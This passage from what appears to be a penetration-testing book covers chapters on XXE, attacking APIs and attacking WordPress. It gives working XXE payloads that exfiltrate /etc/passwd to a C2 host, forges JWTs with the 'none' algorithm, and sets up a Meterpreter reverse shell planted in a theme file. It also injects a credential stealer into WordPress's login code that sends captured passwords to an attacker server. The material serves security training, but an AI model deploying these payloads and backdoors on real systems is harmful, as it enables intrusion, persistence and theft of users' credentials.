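  <!ELEMENT xxe ANY>
  <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
  <!ENTITY % conn "<!ENTITY exfil SYSTEM 'http://c2.spider.ml/exfil?%data;'>">
  %conn;
]>
<xxe>&exfil;</xxe>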
As you can see, we are defining the %data and %conn parameter
entities in our DOCTYPE. The %conn entity also defines a general entity,
&exfil, which will attach the Base64-encoded %data entity to our C2
URL for exfiltration.
Simply put, the vulnerable XML parser will perform the following:
Fetch the target file (/etc/passwd in our example), Base64-encode its contents using the php:// filter, and store the result in the %data parameter entity
Expand %conn, which defines a new general entity, &exfil, pointing to our C2 URL with the encoded data appended
Resolve &exfil in the document body, making an HTTP request to c2.spider.ml that leaks the data in the URL
We can check our payload for errors locally using the xmllint Linux
command, as shown:
^
payload.xml:5: parser warning : not validating
will not read content for PE entity data
<!ENTITY % conn "<!ENTITY exfil SYSTEM
'http://c2.spider.ml/exfil?%data;'>">
^
payload.xml:6: parser error : PEReference: %conn;
not found
%conn;
^
payload.xml:8: parser error : Entity 'exfil' not
defined
<xxe>&exfil;</xxe>
^
Note
xmllint is available in the libxml2-utils package on Debian-
based distributions, such as Kali.
The workaround is easy enough. We will store the entity declarations
for %data and %conn on our C2 server in an external DTD file:
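A sketch of that payload.dtd, hosted on the C2 server:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % conn "<!ENTITY exfil SYSTEM 'http://c2.spider.ml/exfil?%data;'>">
The slimmed-down payload.xml then pulls the DTD in and invokes it:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
  <!ENTITY % dtd SYSTEM "http://c2.spider.ml/payload.dtd">
  %dtd;
  %conn;
]>
<xxe>&exfil;</xxe>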
The only real difference here is that we moved our two parameter
entity declarations into an external DTD and we are now referencing
it in our XML DOCTYPE.
As expected, our XML data did not generate any errors and it did not
return any data either. We are flying blind:
Figure 10.18: The modified XML exploit code
The first request comes in for the payload.dtd file; this means we
have confirmed the XXE vulnerability. The contents are processed
and the subsequent call to the exfil URL containing our data shows
up in the logs almost immediately.
Once parsed, the <xxe> tag would contain the contents of the
/etc/passwd file. Asking PHP to execute code is not much more
difficult thanks to PHP's expect module. Although not typically
deployed by default, the expect extension provides PHP applications
with an expect:// wrapper, allowing developers to execute shell
commands through a URL-like syntax.
Much like the file:// wrapper, expect:// provides read and write
access to the PTY stream, as opposed to the filesystem. Developers
can use the fopen function with an expect:// wrapper to execute
commands and retrieve their output:
<?php
$stream = fopen("expect://ssh root@remotehost uptime", "r");
?>
Once completed, the result can be used in the rest of the application.
When attacking XML, we don't need to execute PHP code and call
the fopen function. The expect:// wrapper is readily available to XML
parsers.
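So an external entity can invoke a command directly. A sketch, assuming the expect extension is loaded on the target:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ELEMENT book ANY>
  <!ENTITY shell SYSTEM "expect://id">
]>
<book>
  <title>The Flat Mars Society</title>
  <publisher>&shell;</publisher>
  <author>Elon Musk</author>
</book>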
There are a few steps we need to take, which some may call magic,
in order to upgrade our shell. First, we can call python to spawn a
new TTY bash shell. Although not perfect, it's better than what we
had before:
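A commonly used one-liner for this is:
python -c 'import pty; pty.spawn("/bin/bash")'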
The one-liner may look strange if you're not familiar with Python, but
all it really does is import the pty package and spawn a bash shell.
In our reverse shell, we execute the python command and the result
should look familiar:
There are some issues with this still: while Vim will work, there's no
access to history, or Tab completion, and Ctrl-C will terminate the
shell.
Let's go a step further and try to upgrade to a full TTY using stty and
the local terminal configuration.
First, once the shell is upgraded using the preceding Python one-
liner, we have to send the process to the background using Ctrl-Z:
Note
Our C2 server is running in a screen session, but you can expect
to see xterm-256color or Linux on a typical Kali installation.
Now, we need the configured rows and columns for the terminal
display. To get these values, we use the stty program with the -a
option:
root@spider-c2-1:~# stty -a
speed 38400 baud; rows 43; columns 142; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof =
^D; eol = <undef>; eol2 = <undef>; swtch =
[...]
The next command may seem as though it breaks the terminal, but
in order to prevent Ctrl-C from killing our shell, we have to turn the
TTY to raw and disable the echo of each character. The commands
we input in our shell will still be processed, but the terminal itself,
without a reverse shell active, may look broken.
We tell stty to set the terminal to raw and disable echo with -echo:
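On our local terminal (not inside the reverse shell), that looks like this, followed by fg, typed blind since echo is now off, to bring the netcat listener back to the foreground:
stty raw -echo
fg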
Returning from the background, you will see the reverse shell
command echoed back to the screen: nc -lvp 443, and everything
may look a bit broken again. No problem– we can type reset to
clean it up.
Inside the reverse shell, now that everything looks good again, we
also need to set the same terminal options, including rows, columns,
and type, in order for the shell to work properly:
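Using the values gathered earlier from stty -a, and the terminal type noted before (screen in our case), that looks something like this:
export TERM=screen
stty rows 43 columns 142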
The result is a fully working terminal with all the fancy features, and
yes, we can even run screen in our netcat reverse shell:
Chapter 11. Attacking APIs
It's not all rainbows with this type of approach, however. New
security challenges are introduced with this model. Decoupled
services mean a larger attack surface with multiple instances, be
they virtual machines or Docker containers. More components
usually equate to a greater chance of misconfiguration, which can, of
course, be taken advantage of by us.
Authentication and authorization enforcement between components
is a new problem to solve as well. If my monolithic application has
every component built in, I don't really need to worry about securely
communicating with the authentication module, as it resides on the
same server, and sometimes in the same process. If my
authentication module was decoupled and it is now an HTTP web
service running in the cloud, I have to consider the network
communication between my user interface and the authentication
module instance in the cloud. How does the API authenticate my
user interface? How can the two components securely negotiate an
authentication response so that the user is allowed access to the
other components?
There are certainly other types of protocols that APIs can use, but
while their protocols differ, the majority of the same security
challenges remain. The most popular protocols are RESTful APIs,
followed by SOAP APIs.
SOAP
SOAP was developed by Microsoft because Distributed
Component Object Model (DCOM) is a binary protocol, which
makes communication over the internet a bit more complicated.
SOAP leverages XML instead, a more structured and human-
readable language, to exchange messages between the client and
the server.
Note
SOAP is standardized and is available for review in its entirety
at https://www.w3.org/TR/soap12/.
A SOAP request to the application's /UserData endpoint might look like this:
<?xml version="1.0"?>
<soap:Envelope
  xmlns:soap="http://www.w3.org/2003/05/soap-envelope/"
  soap:encodingStyle="http://www.w3.org/2003/05/soap-encoding">
  <soap:Body xmlns:m="http://internal.api/users">
    <m:GetUserRequest>
      <m:Name>Administrator</m:Name>
    </m:GetUserRequest>
  </soap:Body>
</soap:Envelope>
The response from the server, as you would expect, is also XML-
formatted:
HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8

<?xml version="1.0"?>
<soap:Envelope
  xmlns:soap="http://www.w3.org/2003/05/soap-envelope/"
  soap:encodingStyle="http://www.w3.org/2003/05/soap-encoding">
  <soap:Body xmlns:m="http://internal.api/users">
    <m:GetUserResponse>
      <m:FullName>Dade Murphy</m:FullName>
      <m:Email>[email protected]</m:Email>
      <m:IsAdmin>True</m:IsAdmin>
    </m:GetUserResponse>
  </soap:Body>
</soap:Envelope>
While the Envelope, Body, and Header tags are standardized, the
contents of the body can vary depending on the request type, the
application, and the web service implementation itself. The
GetUserRequest action and its Name parameter are specific to the
/UserData endpoint. To look for potential vulnerabilities, we need
to know all the possible endpoints and their respective actions or
parameters. How can we grab this information in a black-box
scenario?
The last resort is, obviously, just observing the web, mobile, or native
applications interacting with the API, capturing the HTTP traffic in
Burp, and replaying it through the Intruder or Scanner modules. This
is certainly not ideal, as vulnerable parameters or actions may never
be called under normal application operation. When the scope
allows, it's always best to get the WSDL straight from the developer.
REST
REST is the dominant architectural style you will likely encounter in
modern applications. It is simple to implement and easy to read, and
therefore widely adopted by developers. While not as mature as
SOAP, it does provide a simple way to achieve decoupled design
with microservices.
Much like SOAP, RESTful APIs operate over HTTP and they make
heavy use of the protocol verbs, including but not limited to:
GET
POST
PUT
DELETE
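For illustration only (the path and header name here are hypothetical), a token-authenticated request might look like this:
GET /user/admin HTTP/1.1
Host: api.ecorp.local:8081
X-Auth-Token: [token value]
Accept: application/json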
HTTP/1.0 200 OK
Server: WSGIServer/0.1 Python/2.7.11
Content-Type: text/json
A 200 HTTP response indicates that it was successful, our token was
valid, and we now have a JSON object with all the details concerning
the admin user.
RESTful APIs typically use JSON for requests and responses, but
there is no hard standard and developers may choose to use a
custom XML protocol or even raw binary. This is unusual, as
microservices interoperability and maintenance becomes difficult, but
it is not unheard of.
API authentication
Decoupling brings about a few more challenges when it comes to
authentication and authorization. It's not uncommon to have an API
that does not require authentication, but the chances are some web
services you'll encounter will require their clients to authenticate in
one way or another.
APIs are similar in that they require some sort of secret key or token
to be passed back with each request that requires authentication.
This token is usually generated by the API and given to the user
after successfully authenticating via other means. While a typical
web application will almost always use the Cookie header to track the
session, APIs have a few options.
Basic authentication
Yes, this is also common in web applications but is generally not
used in modern applications, due to security concerns. Basic
authentication will pass the username and password in cleartext via
the Authorization header:
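For example (the credentials are made up; the Base64 value simply decodes to admin:secret):
GET /users?name=admin HTTP/1.1
Host: api.ecorp.local:8081
Authorization: Basic YWRtaW46c2VjcmV0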
The obvious issues with this are that the credentials are flying over
the wire in cleartext and attackers only need to capture one request
to compromise the user. Session IDs and tokens will still provide
attackers with access, but they can expire and can be blacklisted.
API keys
A more common way to authenticate is by supplying a key or token
with our API request. The key is unique to the account with access to
the web service and should be kept secret, much like a password.
Unlike a password, however, it is not (usually) generated by the user
and thus is less likely to be reused in other applications. There's no
industry standard on how to pass this value to APIs, although Open
Authorization (OAuth) and SOAP have some requirements defined
by the protocol. Custom headers, the Cookie header, and even
through a GET parameter are some of the common ways tokens or
keys are sent along with the request.
Using a GET URL parameter to pass the key is generally a bad idea
because this value can be cached by browsers, proxies, and web
server log files:
GET /users?name=admin&api_key=aG93IGFib3V0IGEgbmljZSBnYW1lIG9mIGNoZXNz HTTP/1.1
Host: api.ecorp.local:8081
Content-Type: application/json
Accept: application/json
Cache-Control: no-cache
Another option is using a custom header to send the API key with
the request. This is a slightly better alternative but still requires
secrecy through HTTPS to prevent MITM attacks from capturing this
value:
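For example, moving the key from the earlier URL into a custom header (the header name varies from API to API; X-API-Key is only an illustration):
GET /users?name=admin HTTP/1.1
Host: api.ecorp.local:8081
X-API-Key: aG93IGFib3V0IGEgbmljZSBnYW1lIG9mIGNoZXNz
Accept: application/json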
Bearer authentication
Similar to keys, bearer tokens are secret values that are usually
passed via the Authorization HTTP header as well, but instead of
using the Basic type, we use the Bearer type. For REST APIs, as
long as the client and server agree on how to exchange this token,
there is no standard defining this process and therefore you may see
slight variations of this in the wild:
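A typical request carrying the bearer token (the same JWT dissected next) looks like this:
GET /users?name=admin HTTP/1.1
Host: api.ecorp.local:8081
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjEiLCJ1c2VyIjoiYWRtaW4iLCJpc19hZG1pbiI6dHJ1ZSwidHMiOjEwNDUwNzc1MH0.TstDSAEDcXFE2Q5SJMWWKIsXV3_krfE4EshejZXnnZw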
JWTs
JWTs are a relatively new authentication mechanism that is gaining
market share with web services. They are a compact, self-contained
method of passing information securely between two parties.
Note
OAuth information can be found at https://oauth.net/2/.
JWTs are essentially claims that have been signed using either a
hash-based message authentication code (HMAC) with a secret
key, or an RSA key pair. HMAC is an algorithm that can be used
to verify both the data integrity and the authenticity of a message,
which works well for JWTs. JWTs are a combination of a base64url
encoded header, payload, and the corresponding signature:
base64url(header) . base64url(payload) . base64url(signature)
The header of the token will specify the algorithm used for signing
and the payload will be the claim (for example, I am user1 and I am
an administrator), while the third chunk will be the signature itself.
If we inspect the preceding bearer token, we can see the make-up of
a typical JWT. There are three chunks of information separated by a
period, encoded using URL-safe Base64.
Note
URL-safe Base64-encoded uses the same alphabet as traditional
Base64, with the exception of replacing the characters + with -
and / with _.
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
.
eyJpZCI6IjEiLCJ1c2VyIjoiYWRtaW4iLCJpc19hZG1pbiI6dHJ1ZSwidHMiOjEwNDUwNzc1MH0
.
TstDSAEDcXFE2Q5SJMWWKIsXV3_krfE4EshejZXnnZw
The first chunk is the header, describing the algorithm used for
signing. In this case, HMAC with SHA-256. The type is defined as a
JWT.
> atob('eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9')
"{"alg":"HS256","typ":"JWT"}"
> atob('eyJpZCI6IjEiLCJ1c2VyIjoiYWRtaW4iLCJpc19hZG1pbiI6dHJ1ZSwidHMiOjEwNDUwNzc1MH0')
"{"id":"1","user":"admin","is_admin":true,"ts":104507750}"
JWT quirks
While this process is currently cryptographically safe, there are a few
ways we can play with this token to try to fool poor API
implementations.
First of all, while the header and the payload are signed, we can
actually modify them. The token data is within our control. The only
portion we don't know is the secret key. If we modify the payload, the
signature will fail and we expect the server to reject our request.
Note
The full JWT RFC is available here:
https://tools.ietf.org/html/rfc7519.
The JWT standard also defines an unsecured variant, which sets the
signing algorithm to "none" and carries no signature at all. Some JWT
libraries will follow the standard and support this particular algorithm
as well. So, what happens when we use the "none" algorithm with our
preceding payload?
Our token would look like this, with no signature appended after the
last period:
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0
.
eyJpZCI6IjEiLCJ1c2VyIjoiYWRtaW4iLCJpc19hZG1pbiI6dHJ1ZSwidHMiOjEwNDUwNzc1MH0
.
[blank]
The token will be verified and deemed valid if the server-side library
adheres to the JWT RFC. We can test this modified token using the
Burp Suite JSON Web Tokens extension, which can be downloaded
from the BApp Store:
We can enter the JWT value in the first field and supply a dummy
key. Since we are no longer using the keyed HMAC, this value will
be ignored. The extension should confirm that the signature and
JWT token are valid:
Figure 11.4: JWT with no signature deemed valid
Note
More information on this type of attack can be found on Auth0:
https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-
libraries/.
Note
JWT4B is available for download on GitHub at
https://github.com/mvetsch/JWT4B.
Once we have downloaded the JWT4B JAR file to disk, we can load
it manually into Burp. In the Extender tab, under Extensions, click
the Add button:
In the Load Burp Extension popup window, we can tell Burp to load
the JWT4B JAR file from the location on disk:
Figure 11.6: Loading the JWT4B JAR extension file
Note
Postman is available in Free, Pro, and Enterprise versions at
https://www.getpostman.com/.
Installation
There are Linux, Mac, and Windows versions of the Postman client.
For simplicity's sake, we will use the Linux client on our attack
machine, Kali. Installation is fairly straightforward on Windows and
Mac, but on Linux you may need a couple of dependencies to get
going.
root@kali:~/tools# wget https://dl.pstmn.io/download/latest/linux64 -O postman.tar.gz
[...]
HTTP request sent, awaiting response... 200 OK
Length: 78707727 (75M) [application/gzip]
Saving to: 'postman.tar.gz'
[...]
We will extract the contents to disk in our tools directory using the tar zxvf command, and then launch the client from the extracted Postman directory:
root@kali:~/tools# ~/tools/Postman/Postman
Figure 11.8: Postman client running on Linux
The user interface is fairly self-explanatory for the most part. We can
enter an API URL, change the HTTP verb, pass in custom headers,
and even build a valid authorization with a couple of clicks.
As a test, we can issue the same request we made with curl earlier.
The response will appear in the Body tab, shown in the following
screenshot, with the option to beautify the contents. Postman can
automatically parse and format the response as XML, HTML, JSON,
or plaintext. This is a welcome feature when the response
is a massive blob of data:
Figure 11.9: Sample Postman request to the API
Upstream proxy
Postman also supports routing requests through either the system
proxy or a custom server; the wise choice here is Burp or OWASP ZAP. Once we import and run a collection, every request will be captured, ready to be inspected and replayed.
Under File and SETTINGS, there is a Proxy tab, which should let us
point to the local Burp proxy, 127.0.0.1 on port 8080 by default:
Figure 11.10: Postman upstream proxy configuration
The environment
In order to build effective collections, we should create a new
Postman environment for each target API. Postman environments
allow us to store data in variables that will prove useful for activities,
such as passing authorization tokens between requests within a
collection. To create a new environment, we can use the Create
New tab in the top-left corner:
The following figure shows a simple GET request queued to run in the
ECorp API environment:
Collections
As we said earlier, a collection is simply a list of API requests in a
particular sequence. They can be exported to JSON and imported
into any Postman client, making them really portable.
To showcase the power of Postman collections, we will create one
for our vulnerable API instance, api.ecorp.local, running on port
8081.
Note
The documentation can be found in the README.md for
https://github.com/mattvaldes/vulnerable-api.
According to the documentation, we can request a session token by POSTing credentials to the /tokens endpoint in the following format:

{
  "auth": {
    "passwordCredentials": {
      "username": "user1",
      "password": "pass1"
    }
  }
}
A successful authentication returns a response containing a temporary token under access.token.id:

{
  "access": {
    "token": {
      "expires": "[Expiration Date]",
      "id": "[Token]"
    },
    "user": {
      "id": 1,
      "name": "user1"
    }
  }
}
We can then pass the id value to the /user/1 endpoint via the X-
Auth-Token header and the request should succeed:
Once again, from the Create New button in the top-left, select
Collection:
Figure 11.16: Creating a new collection
All of the requests we've made are recorded in the History tab in the
workspace. We can highlight the ones we need for the collection and
click the Save button next to Send in the top-right corner:
Figure 11.18: Saving requests to a collection
At the bottom, we should see our new ECorp API collection and we
can select it to save our requests:
Repeat this process for any requests that must go into this collection.
When run, we expect our collection to get a new token in the first
request and make a second authenticated request to /user/1 using
the newly provided token:
For our Get Auth Token request in the ECorp API collection, the test
needs to inspect the response, parse it as JSON, and extract the
token ID. To pass it to another request, we can leverage the ECorp
API environment and store the data in a variable we call auth_token.
The first test simply checks to see whether the HTTP response from
the API was 200. Anything else will throw an error during the
collection run.
The second test will parse the response text as JSON and store it in
the local data variable. If you recall the hierarchy of the /tokens
response, we need to access the id value in the access.token field
using the JavaScript array notation: data['access']['token']['id'].
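Put together, the test script attached to the Get Auth Token request would look something like the following sketch, written in Postman's older test-script syntax (newer clients expose the same functionality through the pm.* API):

// Test 1: the authentication request must return HTTP 200
tests['Status code is 200'] = responseCode.code === 200;

// Test 2: parse the JSON response and store the token ID for later requests
var data = JSON.parse(responseBody);
postman.setEnvironmentVariable('auth_token', data['access']['token']['id']);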
Our second request to /user/1 requires that we pass this value via
the X-Auth-Token header. To do this, we add a new custom header
and, for the value, we pull up a list of existing variables by typing {{
in the Value field. Postman will autocomplete existing variables for
us:
Collection Runner
Collections can be exported and imported using the familiar JSON
format. Importing is a straightforward drag-and-drop operation.
Developers and QAs can create these collections the same way we
did earlier, export them, and as part of the engagement, send the file
to us. This greatly simplifies our job of assessing the API, because
the time-consuming work has already been done.
If all goes well, we should see green across the board, as our tests
should have succeeded, meaning the authentication request was
successful, the token was extracted, and the user query returned
some data:
Figure 11.26: Successful Postman collection run
We can use all the tips and tricks we already know to find these issues, with some exceptions. Consider an API response like the following: the Content-Type is application/json, so any payload reflected in the body will not be rendered as HTML by the client that receives it:
HTTP/1.0 200 OK
Date: Tue, 24 Apr 2018 17:14:03 GMT
Server: WSGIServer/0.1 Python/2.7.11
Content-Length: 80
Content-Type: application/json
With APIs, we may still have hope. Web services are not typically
accessed directly in a decoupled environment. It is possible that this
particular API is leveraged by a web application. That error message
could eventually find its way into a browser, which may eventually
render our payload. What if all errors are logged by the web service
and later neatly rendered in a status dashboard that's only visible
internally? We would then have JavaScript code execution in the browser of any analyst who inspects the state of the API.
APIs may be the latest trend for web and mobile applications, but
they're not that different from the usual HTTP application. In fact, as
we saw earlier, microservice architecture brings about some new
challenges when it comes to authentication, which can be exploited
alongside the usual server-side and client-side vulnerabilities.
Coming up in the next chapter, we will look at CMSs, and some ways
to discover and subvert them for fun and profit.
Chapter 12. Attacking CMS
In this chapter, we will discuss attacking CMSs and WordPress in
particular. It's hard to talk about web applications and not mention
WordPress. WordPress is so common on the internet that you will
likely come across many instances of it in your career. After all,
almost a third of all websites are running on the platform and it is by
far the most popular CMS.
Attackers love WordPress because the very thing that sets it apart
from the competition — a massive community — also makes it
difficult to secure. The reason WordPress has the lion's share of the
market is because users don't need technical expertise to operate a
foodie blog, and therein lies the problem. Those same non-technical
users are less likely to update plugins or apply core patches, let
alone harden their WordPress instance, and will not stray from that
baseline through the years.
It's easy to pick on WordPress, but Drupal and Joomla make great
targets as well. They suffer from the same problems: vulnerable plugins and themes, and seldom-updated installations. WordPress is the Goliath and we will focus our attention on it, but the attack methodology will translate to any content management framework, although the tools may differ slightly.
Application assessment
Just as we've done with other applications, when we come across a
WordPress or CMS instance, we have to do some reconnaissance:
look for low-hanging fruit and try to understand what we're up
against. There are a few tools to get us going and we will look at a
common scenario where they can help us to identify issues and
exploit them.
WPScan
The first thing attackers reach for when they encounter a WordPress
CMS application is usually WPScan. It is a well-built and frequently
updated tool used to discover vulnerabilities and even guess
credentials. Its main functions include:
Username enumeration
Credential brute-forcing
Vulnerability scanning
Note
Using an upstream proxy with WPScan can generate a ton of
data in Burp's proxy history, especially when performing a
credential attack or active scan.
Proxying our scan through Burp gives us some control over the
outgoing connections:
Figure 12.1: Burp capturing WPScan web requests
Note
The default user agent (WPScan vX.X.X) can be changed with
the --user-agent switch or randomized with --random-agent.
Note
WPScan is available on Kali and most penetration testing
distributions. It can also be found on https://wpscan.org/ or
cloned from GitHub: https://github.com/wpscanteam/wpscan.
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
    Reference: https://wpvulndb.com/vulnerabilities/9021
    Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
    Reference: https://github.com/quitten/doser.py
    Reference: https://thehackernews.com/2018/02/WordPress-dos-exploit.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Active scans will test whether known plugin files are present in the
wp-content folder and alert on any existing vulnerabilities. This is
done by sending a ton of URL requests to known paths and if there's
a response, WPScan assumes the plugin is available.
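Conceptually, the active check behaves like the following sketch; the plugin names and the HEAD-based probe are illustrative assumptions, and WPScan's real plugin database and detection logic are far more thorough:

// Sketch: naive active plugin detection by probing known plugin paths.
const plugins = ['akismet', 'contact-form-7', 'google-document-embedder'];

for (const plugin of plugins) {
  const url = 'http://cookingwithfire.local/wp-content/plugins/' + plugin + '/';
  fetch(url, { method: 'HEAD' })
    .then(res => {
      // Anything other than a 404 suggests the plugin directory exists
      if (res.status !== 404) {
        console.log('[+] Possible plugin: ' + plugin + ' (' + res.status + ')');
      }
    })
    .catch(() => { /* unreachable host; ignore */ });
}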
searchsploit will list the Exploit Title and the associated Path,
which is relative to /usr/share/exploitdb/ on Kali distributions.
sqlmap
In order to confirm this vulnerability in our target, we can jump to
sqlmap, the de facto SQLi exploitation tool. sqlmap will help us to
quickly generate payloads to test for injection in all of the popular
Database Management Systems (DBMS), such as MySQL,
PostgreSQL, MS SQL, and even Microsoft Access. To launch a new
sqlmap session, we pass our full target URL via the -u parameter.
Notice that the target URL includes the GET query parameters as
well, with some dummy data. If we don't tell sqlmap to target gpid, it
will check every other parameter for injection as well, which makes it a great SQLi discovery tool, not just an exploitation tool. Thanks to our searchsploit query, we know gpid is the vulnerable parameter, so we can focus our attack on it specifically with the -p parameter.
root@kali:~# sqlmap -u "http://cookingwithfire.local/wp-content/plugins/google-document-embedder/view.php?embedded=1&gpid=0" -p gpid
For the remaining tests, sqlmap will confirm the existence of the
vulnerability and save the state locally. Subsequent attacks on the
target will use the identified payload as a starting point to inject SQL
statements.
root@kali:~#
Note
If you want to test this vulnerable plugin in your own WordPress
instance, you can download version 2.5 of the Google Document
Embedder plugin from https://github.com/wp-plugins/google-
document-embedder/tags?after=2.5.1.
Droopescan
Although not as fully-featured as WPScan, droopescan does support
more than just WordPress as a scanning target. It is ideal for Drupal
instances and it can also do some basic scanning for Joomla.
Note
Arachni pre-compiled binaries can be found on
http://www.arachni-scanner.com/.
root@kali:~/tools/arachni/bin# ./arachni_web_create_user [email protected] A!WebOf-Lies* root
User 'root' with e-mail address '[email protected]' created with password 'A!WebOf-Lies*'.
root@kali:~/tools/arachni/bin#
Note
Take care to clear your shell history if this is a production
installation of Arachni.
root@kali:~/tools/arachni/bin# ./arachni_web
Puma 2.14.0 starting...
* Min threads: 0, max threads: 16
* Environment: development
* Listening on tcp://localhost:9292
::1 - - "GET /unauthenticated HTTP/1.1" 302 - 0.0809
[...]
::1 - - "GET /navigation HTTP/1.1" 304 - 0.0473
::1 - - "GET /profiles?action=index&controller=profiles&tab=global HTTP/1.1" 200 - 0.0827
::1 - - "GET /navigation HTTP/1.1" 304 - 0.0463
Arachni ships with a few scan profiles out of the box, including:
Default
Cross-Site Scripting (XSS)
SQL injection
To launch a new scan using the web UI, select New under Scans, as
shown:
Figure 12.3: Starting a new Arachni scan
The SQL injection scan profile in Arachni can also be used in a scan
to verify the issue we found earlier with WPScan, in the
cookingwithfire.local blog. This particular profile should complete
much faster than the default scan.
Figure 12.6: SQL injection found by Arachni
The keen eye will notice that Arachni found a time-based blind SQL
injection where sqlmap was able to confirm the vulnerability using an
error-based technique. Technically, both techniques can be used to
exploit this particular application, but the error-based technique is
preferred. Time-based injection attacks are inherently slow. If
Arachni finds a time-based blind SQL injection vulnerability, it may
be a good idea to aim sqlmap at the same URL and see whether
anything more reliable can be identified.
Backdooring the code
Once we obtain some access to a CMS instance, such as
WordPress, Drupal, or Joomla, there are a couple of ways to persist
or even escalate privileges horizontally or vertically. We can inject
malicious PHP code, which will allow us to gain shell access at will.
Code execution is great, but in some scenarios, we don't necessarily
need it. There are other ways to exploit the application. Alternatively,
we can modify the CMS core files to capture credentials in cleartext
as users and administrators log in.
Persistence
When attacking CMS installations, such as WordPress, we may find
ourselves with administrative credentials in hand. Maybe we
successfully enumerated users with WPScan and subsequently
brute-forced credentials for a privileged user. This is more common
than you'd expect, especially in environments where WordPress is
either temporarily stood up for development purposes or just brought
up and forgotten.
Let's explore this scenario using the --enumerate u option for wpscan:
The results show us at least two users that we can target for a login
brute-force attack. WPScan can brute-force the credentials for a
particular account using the --usernames switch and a wordlist
provided by --passwords.
After a short while, the credentials for mary are confirmed and we are free to log in as this user.
root@kali:~# msfconsole -q
Module options
(exploit/unix/webapp/wp_admin_shell_upload):
There are a few options we need to fill in with the right information
before we can launch the exploit and hopefully get a shell back.
We have to get a bit more creative to maintain our access to the site.
Thankfully, since it is so customizable, WordPress provides a file
editor for plugins and themes. If we can modify a theme file and
inject reverse shell code, every time we call it via the web, we will
have access. If the administrator password changes tomorrow, we
can still get back on.
Module options
(payload/php/meterpreter/reverse_tcp):
Generates a payload.
OPTIONS:

    -E            Force encoding.
    -b <opt>      The list of characters to avoid: '\x00\xff'
    -e <opt>      The name of the encoder module to use.
    -f <opt>      The output file name (otherwise stdout)
    -h            Help banner.
    -i <opt>      The number of encoding iterations.
    -k            Keep the template executable functional
    -o <opt>      A comma separated list of options in VAR=VAL format.
    -p <opt>      The Platform for output.
    -s <opt>      NOP sled length.
    -t <opt>      The output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -x <opt>      The executable template to use
For a PHP payload, not many of these switches will have an impact.
We can generate the raw payload, which would be the PHP code for
the stager. We don't have to write it to a file; it's typically fairly small
and we can copy it straight from the terminal output.
To make sure our code blends in more with the rest of the 404.php
page, we can use a source code beautifier like CyberChef. Let's
take the non-Base64-encoded raw PHP code and run it through the
CyberChef tool.
Note
CyberChef is a great tool with a ton of features. Code
beautification is just scratching the surface of what it can do.
CyberChef is developed by GCHQ and available for free to use
online or to download at https://gchq.github.io/CyberChef
At this point, we can grab the beautified payload and paste it right
into the WordPress theme editor. We need to add the code
immediately before the get_header() function is called. This is
because 404.php was meant to be include()-d in another page that
loads the definition for this function. When we call the 404 page
directly, get_header() will not be defined and PHP will throw a fatal
error. Our shell code will not be executed. We have to be aware of
these types of issues when we are modifying anything on the target.
Ideally, if time permits, we set up a similar test environment and check how the application handles our modifications.
The Meterpreter payload will fit nicely just above the get_header()
function on line 12, as shown:
Adding the code in this location should prevent any PHP errors from
interfering with our malicious code.
Figure 12.10: Our malicious payload blending in with the rest of 404.php
Exploit target:
Id Name
-- ----
0 Wildcard Target
We can now run the handler with the -j option, which will send it to
the background, ready for incoming connections from our victim:
meterpreter >
Credential exfiltration
Consider another scenario where we have exploited a vulnerability in
the website, granting us shell access to the server. Maybe the
WordPress site itself is patched and user passwords are complex,
but if the WordPress installation is hosted on a shared system, it is
not uncommon for attackers to gain shell access through an
unrelated component of the site. Perhaps we managed to upload a
web shell or even force the web server to spawn a reverse shell
back to our machine through a command injection flaw. In the earlier
scenario, we had guessed the password of mary, but what if we
wanted more? What if the blog owner msmith has access to other
systems?
[...]
Active sessions
===============
Let's load the module and set the SRVHOST and SRVPORT as shown:
Jobs
====
  Id  Name                       Payload                       Payload opts
  --  ----                       -------                       ------------
  0   Exploit: multi/handler     php/meterpreter/reverse_tcp   tcp://attacker.c2:4444
  1   Auxiliary: server/socks4a
This WordPress database user will likely have limited access to the
server as well, but it should be enough for our purposes. We can see
the WordPress database and we can enumerate its tables and data:
PHP provides two handy functions we can inject into the wp_signon function to exfiltrate the WordPress credentials quickly and easily: file_put_contents(), which can append data to a file we retrieve later, and file_get_contents(), which can be pointed at an external URL to send the data to a server we control (the @ prefix suppresses any errors it may generate):

@file_get_contents([c2 URL]);

For our credential stealer, we can use either one (or both) of the following lines of code:
file_put_contents('wp-content/uploads/.index.php.swp', base64_encode(json_encode($_POST)) . PHP_EOL, FILE_APPEND);

@file_get_contents('http://pingback.c2.spider.ml/ping.php?id=' . base64_encode(json_encode($_POST)));
The backdoor code will be added just before the wp_signon function
returns. This ensures we only capture valid credentials: if the credentials supplied are invalid, wp_signon returns early, well before our injected code is reached.
<?php
/**
* Core User API
*
* @package WordPress
* @subpackage Users
*/
[...]
return $user;
}
file_put_contents('wp-content/uploads/.index.php.swp', base64_encode(json_encode($_POST)) . PHP_EOL, FILE_APPEND);
@file_get_contents('http://pingback.c2.spider.ml/ping.php?id=' . base64_encode(json_encode($_POST)));

wp_set_auth_cookie($user->ID, $credentials['remember'], $secure_cookie);
/**
root@kali:~# curl -s http://cookingwithfire.local/wp-content/uploads/.index.php.swp | base64 -d
